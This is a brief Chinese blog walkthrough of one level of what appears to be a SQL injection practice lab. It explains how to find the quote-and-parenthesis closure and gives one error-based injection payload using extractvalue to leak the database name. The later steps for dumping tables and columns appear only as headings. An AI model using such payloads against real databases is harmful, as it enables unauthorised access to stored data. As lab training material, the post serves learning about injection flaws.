标签:database sql img png ase com info highlight code
(1)检测闭合方式
通过 ‘) 闭合。
(2)尝试输入 admin‘)# 无回显。尝试报错注入,
爆表payload:
admin‘) and extractvalue(1,concat(0x7e,(select database()))) and (‘
爆表名
爆users表的列
其他均与12关相同。
标签:database sql img png ase com info highlight code
原文地址:https://www.cnblogs.com/momoli/p/10705249.html
